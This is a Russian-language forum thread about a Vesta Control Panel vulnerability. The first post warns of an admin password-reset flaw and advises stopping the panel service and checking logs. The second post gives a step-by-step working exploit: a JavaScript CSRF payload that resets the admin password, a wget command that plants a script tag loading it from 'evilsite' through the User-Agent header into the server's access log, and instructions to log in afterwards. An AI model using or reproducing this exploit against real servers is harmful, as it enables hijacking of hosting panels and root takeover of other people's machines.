Информация Серьёзная уязвимость в Vesta Control Panel

[X-Shar]

Пользователь X-Shar разместил новый ресурс:

Серьёзная уязвимость в Vesta Control Panel - Vesta Control Panel взлом

Посмотреть вложение 58567

В хостинговой панели VestaCP обнаружена уязвимость, который позволяет злоумышленнику получить админский доступ к панели (а дальше и рутовский к серверу).

Уязвимость базируется на сбросе пароля администратора.

Завтра разработчики обещают выпустить обновление.

Пока рекомендую отключить панель командой:

service vesta stop

и проверить логи системы и панели - это файлы:

/var/log/audit/audit.log
/var/log/secure...

Узнать больше об этом ресурсе...

 

[X-Shar]

Сплоит для Весты:

Poc Exploit
================
1.Подготовьте js файл (evil.js):

function csrfWithToken(url,hanimisToken,password){
  $.get(url, function(gelen) {
    $('body').append($(gelen));
    $('form[id="vstobjects"]').css("display","none");
    var token = $(hanimisToken).attr("token");
    $('form[id="vstobjects"]').attr("action",url);
    $('input[name="v_password"]').val(password);
    $('form[id="vstobjects"]').submit();
  });
};
//password = 1234567
csrfWithToken("/edit/user/?user=admin","#token","123456");

2. Сделайте Get-запрос с этим js-файлом:
wget --header="Accept: text/html" --user-agent="<script src='http://evilsite/evil.js'></script>" http://victimserver

3. Дожидаемся когда администратор прочитает access.log, что сделает инъекцию нашего evil.js

4. Логинимся с изменённым паролем:
http(s)://victim:8083/